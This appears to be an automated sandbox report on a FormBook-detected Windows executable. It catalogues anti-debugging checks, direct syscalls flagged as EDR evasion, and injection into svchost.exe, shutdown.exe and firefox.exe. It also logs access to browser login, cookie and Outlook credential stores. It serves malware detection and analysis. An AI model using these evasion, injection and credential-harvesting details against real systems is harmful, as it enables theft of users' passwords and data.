Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032AE908 mov eax, dword ptr fs:[00000030h]	2_2_032AE908
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032AE908 mov eax, dword ptr fs:[00000030h]	2_2_032AE908
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032BC912 mov eax, dword ptr fs:[00000030h]	2_2_032BC912
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03228918 mov eax, dword ptr fs:[00000030h]	2_2_03228918
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03228918 mov eax, dword ptr fs:[00000030h]	2_2_03228918
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03256962 mov eax, dword ptr fs:[00000030h]	2_2_03256962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03256962 mov eax, dword ptr fs:[00000030h]	2_2_03256962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03256962 mov eax, dword ptr fs:[00000030h]	2_2_03256962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0327096E mov eax, dword ptr fs:[00000030h]	2_2_0327096E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0327096E mov edx, dword ptr fs:[00000030h]	2_2_0327096E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0327096E mov eax, dword ptr fs:[00000030h]	2_2_0327096E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032D4978 mov eax, dword ptr fs:[00000030h]	2_2_032D4978
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032D4978 mov eax, dword ptr fs:[00000030h]	2_2_032D4978
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032BC97C mov eax, dword ptr fs:[00000030h]	2_2_032BC97C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B0946 mov eax, dword ptr fs:[00000030h]	2_2_032B0946
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032429A0 mov eax, dword ptr fs:[00000030h]	2_2_032429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032429A0 mov eax, dword ptr fs:[00000030h]	2_2_032429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032429A0 mov eax, dword ptr fs:[00000030h]	2_2_032429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032429A0 mov eax, dword ptr fs:[00000030h]	2_2_032429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032429A0 mov eax, dword ptr fs:[00000030h]	2_2_032429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032429A0 mov eax, dword ptr fs:[00000030h]	2_2_032429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032429A0 mov eax, dword ptr fs:[00000030h]	2_2_032429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032429A0 mov eax, dword ptr fs:[00000030h]	2_2_032429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032429A0 mov eax, dword ptr fs:[00000030h]	2_2_032429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032429A0 mov eax, dword ptr fs:[00000030h]	2_2_032429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032429A0 mov eax, dword ptr fs:[00000030h]	2_2_032429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032429A0 mov eax, dword ptr fs:[00000030h]	2_2_032429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032429A0 mov eax, dword ptr fs:[00000030h]	2_2_032429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032309AD mov eax, dword ptr fs:[00000030h]	2_2_032309AD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032309AD mov eax, dword ptr fs:[00000030h]	2_2_032309AD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B89B3 mov esi, dword ptr fs:[00000030h]	2_2_032B89B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B89B3 mov eax, dword ptr fs:[00000030h]	2_2_032B89B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B89B3 mov eax, dword ptr fs:[00000030h]	2_2_032B89B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032BE9E0 mov eax, dword ptr fs:[00000030h]	2_2_032BE9E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032629F9 mov eax, dword ptr fs:[00000030h]	2_2_032629F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032629F9 mov eax, dword ptr fs:[00000030h]	2_2_032629F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032C69C0 mov eax, dword ptr fs:[00000030h]	2_2_032C69C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0323A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0323A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0323A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0323A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0323A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0323A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0323A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0323A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0323A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0323A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0323A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0323A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032649D0 mov eax, dword ptr fs:[00000030h]	2_2_032649D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032FA9D3 mov eax, dword ptr fs:[00000030h]	2_2_032FA9D3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03252835 mov eax, dword ptr fs:[00000030h]	2_2_03252835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03252835 mov eax, dword ptr fs:[00000030h]	2_2_03252835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03252835 mov eax, dword ptr fs:[00000030h]	2_2_03252835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03252835 mov ecx, dword ptr fs:[00000030h]	2_2_03252835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03252835 mov eax, dword ptr fs:[00000030h]	2_2_03252835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03252835 mov eax, dword ptr fs:[00000030h]	2_2_03252835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326A830 mov eax, dword ptr fs:[00000030h]	2_2_0326A830
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032D483A mov eax, dword ptr fs:[00000030h]	2_2_032D483A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032D483A mov eax, dword ptr fs:[00000030h]	2_2_032D483A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032BC810 mov eax, dword ptr fs:[00000030h]	2_2_032BC810
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032BE872 mov eax, dword ptr fs:[00000030h]	2_2_032BE872
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032BE872 mov eax, dword ptr fs:[00000030h]	2_2_032BE872
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032C6870 mov eax, dword ptr fs:[00000030h]	2_2_032C6870
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032C6870 mov eax, dword ptr fs:[00000030h]	2_2_032C6870
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03242840 mov ecx, dword ptr fs:[00000030h]	2_2_03242840
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03260854 mov eax, dword ptr fs:[00000030h]	2_2_03260854
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03234859 mov eax, dword ptr fs:[00000030h]	2_2_03234859
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03234859 mov eax, dword ptr fs:[00000030h]	2_2_03234859
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03230887 mov eax, dword ptr fs:[00000030h]	2_2_03230887
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032BC89D mov eax, dword ptr fs:[00000030h]	2_2_032BC89D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032FA8E4 mov eax, dword ptr fs:[00000030h]	2_2_032FA8E4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326C8F9 mov eax, dword ptr fs:[00000030h]	2_2_0326C8F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326C8F9 mov eax, dword ptr fs:[00000030h]	2_2_0326C8F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0325E8C0 mov eax, dword ptr fs:[00000030h]	2_2_0325E8C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0325EF28 mov eax, dword ptr fs:[00000030h]	2_2_0325EF28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032E6F00 mov eax, dword ptr fs:[00000030h]	2_2_032E6F00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03232F12 mov eax, dword ptr fs:[00000030h]	2_2_03232F12
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326CF1F mov eax, dword ptr fs:[00000030h]	2_2_0326CF1F

Source: C:\Users\user\Desktop\KcSzB2IpP5.exe

Code function: 0_2_004C0B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,

0_2_004C0B62

Source: C:\Users\user\Desktop\KcSzB2IpP5.exe	Code function: 0_2_00492622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00492622
Source: C:\Users\user\Desktop\KcSzB2IpP5.exe	Code function: 0_2_0048083F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_0048083F
Source: C:\Users\user\Desktop\KcSzB2IpP5.exe	Code function: 0_2_004809D5 SetUnhandledExceptionFilter,	0_2_004809D5
Source: C:\Users\user\Desktop\KcSzB2IpP5.exe	Code function: 0_2_00480C21 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_00480C21

HIPS / PFW / Operating System Protection Evasion

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Program Files (x86)\TOwdrVmwSMtIzbKoEPfEqDHyqbUsqXMMWSPJpBvzXOXYrZXbwwgrghrHBivqWprCGWDHesrYs\krQctklhjIp.exe	NtOpenKeyEx: Direct from: 0x77672B9C	Jump to behavior
Source: C:\Program Files (x86)\TOwdrVmwSMtIzbKoEPfEqDHyqbUsqXMMWSPJpBvzXOXYrZXbwwgrghrHBivqWprCGWDHesrYs\krQctklhjIp.exe	NtProtectVirtualMemory: Direct from: 0x77672F9C	Jump to behavior
Source: C:\Program Files (x86)\TOwdrVmwSMtIzbKoEPfEqDHyqbUsqXMMWSPJpBvzXOXYrZXbwwgrghrHBivqWprCGWDHesrYs\krQctklhjIp.exe	NtCreateFile: Direct from: 0x77672FEC	Jump to behavior
Source: C:\Program Files (x86)\TOwdrVmwSMtIzbKoEPfEqDHyqbUsqXMMWSPJpBvzXOXYrZXbwwgrghrHBivqWprCGWDHesrYs\krQctklhjIp.exe	NtOpenFile: Direct from: 0x77672DCC	Jump to behavior
Source: C:\Program Files (x86)\TOwdrVmwSMtIzbKoEPfEqDHyqbUsqXMMWSPJpBvzXOXYrZXbwwgrghrHBivqWprCGWDHesrYs\krQctklhjIp.exe	NtTerminateThread: Direct from: 0x77672FCC	Jump to behavior
Source: C:\Program Files (x86)\TOwdrVmwSMtIzbKoEPfEqDHyqbUsqXMMWSPJpBvzXOXYrZXbwwgrghrHBivqWprCGWDHesrYs\krQctklhjIp.exe	NtProtectVirtualMemory: Direct from: 0x77667B2E	Jump to behavior
Source: C:\Program Files (x86)\TOwdrVmwSMtIzbKoEPfEqDHyqbUsqXMMWSPJpBvzXOXYrZXbwwgrghrHBivqWprCGWDHesrYs\krQctklhjIp.exe	NtQueryInformationToken: Direct from: 0x77672CAC	Jump to behavior
Source: C:\Program Files (x86)\TOwdrVmwSMtIzbKoEPfEqDHyqbUsqXMMWSPJpBvzXOXYrZXbwwgrghrHBivqWprCGWDHesrYs\krQctklhjIp.exe	NtAllocateVirtualMemory: Direct from: 0x77672BEC	Jump to behavior
Source: C:\Program Files (x86)\TOwdrVmwSMtIzbKoEPfEqDHyqbUsqXMMWSPJpBvzXOXYrZXbwwgrghrHBivqWprCGWDHesrYs\krQctklhjIp.exe	NtDeviceIoControlFile: Direct from: 0x77672AEC	Jump to behavior
Source: C:\Program Files (x86)\TOwdrVmwSMtIzbKoEPfEqDHyqbUsqXMMWSPJpBvzXOXYrZXbwwgrghrHBivqWprCGWDHesrYs\krQctklhjIp.exe	NtQuerySystemInformation: Direct from: 0x776748CC	Jump to behavior
Source: C:\Program Files (x86)\TOwdrVmwSMtIzbKoEPfEqDHyqbUsqXMMWSPJpBvzXOXYrZXbwwgrghrHBivqWprCGWDHesrYs\krQctklhjIp.exe	NtQueryAttributesFile: Direct from: 0x77672E6C	Jump to behavior
Source: C:\Program Files (x86)\TOwdrVmwSMtIzbKoEPfEqDHyqbUsqXMMWSPJpBvzXOXYrZXbwwgrghrHBivqWprCGWDHesrYs\krQctklhjIp.exe	NtSetInformationThread: Direct from: 0x77672B4C	Jump to behavior
Source: C:\Program Files (x86)\TOwdrVmwSMtIzbKoEPfEqDHyqbUsqXMMWSPJpBvzXOXYrZXbwwgrghrHBivqWprCGWDHesrYs\krQctklhjIp.exe	NtOpenSection: Direct from: 0x77672E0C	Jump to behavior
Source: C:\Program Files (x86)\TOwdrVmwSMtIzbKoEPfEqDHyqbUsqXMMWSPJpBvzXOXYrZXbwwgrghrHBivqWprCGWDHesrYs\krQctklhjIp.exe	NtQueryVolumeInformationFile: Direct from: 0x77672F2C	Jump to behavior
Source: C:\Program Files (x86)\TOwdrVmwSMtIzbKoEPfEqDHyqbUsqXMMWSPJpBvzXOXYrZXbwwgrghrHBivqWprCGWDHesrYs\krQctklhjIp.exe	NtAllocateVirtualMemory: Direct from: 0x776748EC	Jump to behavior
Source: C:\Program Files (x86)\TOwdrVmwSMtIzbKoEPfEqDHyqbUsqXMMWSPJpBvzXOXYrZXbwwgrghrHBivqWprCGWDHesrYs\krQctklhjIp.exe	NtSetInformationThread: Direct from: 0x776663F9	Jump to behavior
Source: C:\Program Files (x86)\TOwdrVmwSMtIzbKoEPfEqDHyqbUsqXMMWSPJpBvzXOXYrZXbwwgrghrHBivqWprCGWDHesrYs\krQctklhjIp.exe	NtReadVirtualMemory: Direct from: 0x77672E8C	Jump to behavior
Source: C:\Program Files (x86)\TOwdrVmwSMtIzbKoEPfEqDHyqbUsqXMMWSPJpBvzXOXYrZXbwwgrghrHBivqWprCGWDHesrYs\krQctklhjIp.exe	NtCreateKey: Direct from: 0x77672C6C	Jump to behavior
Source: C:\Program Files (x86)\TOwdrVmwSMtIzbKoEPfEqDHyqbUsqXMMWSPJpBvzXOXYrZXbwwgrghrHBivqWprCGWDHesrYs\krQctklhjIp.exe	NtClose: Direct from: 0x77672B6C
Source: C:\Program Files (x86)\TOwdrVmwSMtIzbKoEPfEqDHyqbUsqXMMWSPJpBvzXOXYrZXbwwgrghrHBivqWprCGWDHesrYs\krQctklhjIp.exe	NtWriteVirtualMemory: Direct from: 0x7767490C	Jump to behavior
Source: C:\Program Files (x86)\TOwdrVmwSMtIzbKoEPfEqDHyqbUsqXMMWSPJpBvzXOXYrZXbwwgrghrHBivqWprCGWDHesrYs\krQctklhjIp.exe	NtAllocateVirtualMemory: Direct from: 0x77673C9C	Jump to behavior
Source: C:\Program Files (x86)\TOwdrVmwSMtIzbKoEPfEqDHyqbUsqXMMWSPJpBvzXOXYrZXbwwgrghrHBivqWprCGWDHesrYs\krQctklhjIp.exe	NtDelayExecution: Direct from: 0x77672DDC	Jump to behavior
Source: C:\Program Files (x86)\TOwdrVmwSMtIzbKoEPfEqDHyqbUsqXMMWSPJpBvzXOXYrZXbwwgrghrHBivqWprCGWDHesrYs\krQctklhjIp.exe	NtCreateUserProcess: Direct from: 0x7767371C	Jump to behavior
Source: C:\Program Files (x86)\TOwdrVmwSMtIzbKoEPfEqDHyqbUsqXMMWSPJpBvzXOXYrZXbwwgrghrHBivqWprCGWDHesrYs\krQctklhjIp.exe	NtQuerySystemInformation: Direct from: 0x77672DFC	Jump to behavior
Source: C:\Program Files (x86)\TOwdrVmwSMtIzbKoEPfEqDHyqbUsqXMMWSPJpBvzXOXYrZXbwwgrghrHBivqWprCGWDHesrYs\krQctklhjIp.exe	NtQueryInformationProcess: Direct from: 0x77672C26	Jump to behavior
Source: C:\Program Files (x86)\TOwdrVmwSMtIzbKoEPfEqDHyqbUsqXMMWSPJpBvzXOXYrZXbwwgrghrHBivqWprCGWDHesrYs\krQctklhjIp.exe	NtResumeThread: Direct from: 0x77672FBC	Jump to behavior
Source: C:\Program Files (x86)\TOwdrVmwSMtIzbKoEPfEqDHyqbUsqXMMWSPJpBvzXOXYrZXbwwgrghrHBivqWprCGWDHesrYs\krQctklhjIp.exe	NtReadFile: Direct from: 0x77672ADC	Jump to behavior
Source: C:\Program Files (x86)\TOwdrVmwSMtIzbKoEPfEqDHyqbUsqXMMWSPJpBvzXOXYrZXbwwgrghrHBivqWprCGWDHesrYs\krQctklhjIp.exe	NtAllocateVirtualMemory: Direct from: 0x77672BFC	Jump to behavior
Source: C:\Program Files (x86)\TOwdrVmwSMtIzbKoEPfEqDHyqbUsqXMMWSPJpBvzXOXYrZXbwwgrghrHBivqWprCGWDHesrYs\krQctklhjIp.exe	NtResumeThread: Direct from: 0x776736AC	Jump to behavior
Source: C:\Program Files (x86)\TOwdrVmwSMtIzbKoEPfEqDHyqbUsqXMMWSPJpBvzXOXYrZXbwwgrghrHBivqWprCGWDHesrYs\krQctklhjIp.exe	NtSetInformationProcess: Direct from: 0x77672C5C	Jump to behavior
Source: C:\Program Files (x86)\TOwdrVmwSMtIzbKoEPfEqDHyqbUsqXMMWSPJpBvzXOXYrZXbwwgrghrHBivqWprCGWDHesrYs\krQctklhjIp.exe	NtMapViewOfSection: Direct from: 0x77672D1C	Jump to behavior
Source: C:\Program Files (x86)\TOwdrVmwSMtIzbKoEPfEqDHyqbUsqXMMWSPJpBvzXOXYrZXbwwgrghrHBivqWprCGWDHesrYs\krQctklhjIp.exe	NtNotifyChangeKey: Direct from: 0x77673C2C	Jump to behavior
Source: C:\Program Files (x86)\TOwdrVmwSMtIzbKoEPfEqDHyqbUsqXMMWSPJpBvzXOXYrZXbwwgrghrHBivqWprCGWDHesrYs\krQctklhjIp.exe	NtWriteVirtualMemory: Direct from: 0x77672E3C	Jump to behavior
Source: C:\Program Files (x86)\TOwdrVmwSMtIzbKoEPfEqDHyqbUsqXMMWSPJpBvzXOXYrZXbwwgrghrHBivqWprCGWDHesrYs\krQctklhjIp.exe	NtCreateMutant: Direct from: 0x776735CC	Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\KcSzB2IpP5.exe	Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: NULL target: C:\Program Files (x86)\TOwdrVmwSMtIzbKoEPfEqDHyqbUsqXMMWSPJpBvzXOXYrZXbwwgrghrHBivqWprCGWDHesrYs\krQctklhjIp.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: NULL target: C:\Windows\SysWOW64\shutdown.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\shutdown.exe	Section loaded: NULL target: C:\Program Files (x86)\TOwdrVmwSMtIzbKoEPfEqDHyqbUsqXMMWSPJpBvzXOXYrZXbwwgrghrHBivqWprCGWDHesrYs\krQctklhjIp.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\shutdown.exe	Section loaded: NULL target: C:\Program Files (x86)\TOwdrVmwSMtIzbKoEPfEqDHyqbUsqXMMWSPJpBvzXOXYrZXbwwgrghrHBivqWprCGWDHesrYs\krQctklhjIp.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\shutdown.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\shutdown.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write	Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Windows\SysWOW64\shutdown.exe

Thread register set: target process: 6252

Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Windows\SysWOW64\shutdown.exe

Thread APC queued: target process: C:\Program Files (x86)\TOwdrVmwSMtIzbKoEPfEqDHyqbUsqXMMWSPJpBvzXOXYrZXbwwgrghrHBivqWprCGWDHesrYs\krQctklhjIp.exe

Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\KcSzB2IpP5.exe

Memory written: C:\Windows\SysWOW64\svchost.exe base: 7E7008

Jump to behavior

Source: C:\Users\user\Desktop\KcSzB2IpP5.exe

0_2_004C1201

Source: C:\Users\user\Desktop\KcSzB2IpP5.exe

Code function: 0_2_004A2BA5 SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

0_2_004A2BA5

Source: C:\Users\user\Desktop\KcSzB2IpP5.exe

Code function: 0_2_004CB226 SendInput,keybd_event,

0_2_004CB226

Source: C:\Users\user\Desktop\KcSzB2IpP5.exe

Code function: 0_2_004E22DA GetForegroundWindow,GetDesktopWindow,GetWindowRect,mouse_event,GetCursorPos,mouse_event,

0_2_004E22DA

Source: C:\Users\user\Desktop\KcSzB2IpP5.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\KcSzB2IpP5.exe"	Jump to behavior
Source: C:\Program Files (x86)\TOwdrVmwSMtIzbKoEPfEqDHyqbUsqXMMWSPJpBvzXOXYrZXbwwgrghrHBivqWprCGWDHesrYs\krQctklhjIp.exe	Process created: C:\Windows\SysWOW64\shutdown.exe "C:\Windows\SysWOW64\shutdown.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\shutdown.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: C:\Users\user\Desktop\KcSzB2IpP5.exe

0_2_004C0B62

Source: C:\Users\user\Desktop\KcSzB2IpP5.exe

Code function: 0_2_004C1663 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

0_2_004C1663

Source: KcSzB2IpP5.exe	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: KcSzB2IpP5.exe, krQctklhjIp.exe, 00000003.00000000.1403650875.00000000014C0000.00000002.00000001.00040000.00000000.sdmp, krQctklhjIp.exe, 00000003.00000002.3782538364.00000000014C1000.00000002.00000001.00040000.00000000.sdmp, krQctklhjIp.exe, 00000006.00000002.3782766284.0000000001701000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: krQctklhjIp.exe, 00000003.00000000.1403650875.00000000014C0000.00000002.00000001.00040000.00000000.sdmp, krQctklhjIp.exe, 00000003.00000002.3782538364.00000000014C1000.00000002.00000001.00040000.00000000.sdmp, krQctklhjIp.exe, 00000006.00000002.3782766284.0000000001701000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: krQctklhjIp.exe, 00000003.00000000.1403650875.00000000014C0000.00000002.00000001.00040000.00000000.sdmp, krQctklhjIp.exe, 00000003.00000002.3782538364.00000000014C1000.00000002.00000001.00040000.00000000.sdmp, krQctklhjIp.exe, 00000006.00000002.3782766284.0000000001701000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: EProgram Manager
Source: krQctklhjIp.exe, 00000003.00000000.1403650875.00000000014C0000.00000002.00000001.00040000.00000000.sdmp, krQctklhjIp.exe, 00000003.00000002.3782538364.00000000014C1000.00000002.00000001.00040000.00000000.sdmp, krQctklhjIp.exe, 00000006.00000002.3782766284.0000000001701000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\Desktop\KcSzB2IpP5.exe

Code function: 0_2_00480698 cpuid

0_2_00480698

Source: C:\Users\user\Desktop\KcSzB2IpP5.exe

Code function: 0_2_004D8195 GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,

0_2_004D8195

Source: C:\Users\user\Desktop\KcSzB2IpP5.exe

Code function: 0_2_004BD27A GetUserNameW,

0_2_004BD27A

Source: C:\Users\user\Desktop\KcSzB2IpP5.exe

Code function: 0_2_0049B952 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,

0_2_0049B952

Source: C:\Users\user\Desktop\KcSzB2IpP5.exe

Code function: 0_2_004642DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_004642DE

Stealing of Sensitive Information

Yara detected FormBook

Source: Yara match	File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.1482212976.0000000000EA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1481529737.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3783203591.00000000028C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3783026458.0000000002870000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3777177232.0000000002400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1483094484.0000000003800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.3783040936.0000000002BF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\SysWOW64\shutdown.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\shutdown.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\shutdown.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\shutdown.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\shutdown.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\shutdown.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\shutdown.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\SysWOW64\shutdown.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\SysWOW64\shutdown.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Jump to behavior

Source: KcSzB2IpP5.exe	Binary or memory string: WIN_81
Source: KcSzB2IpP5.exe	Binary or memory string: WIN_XP
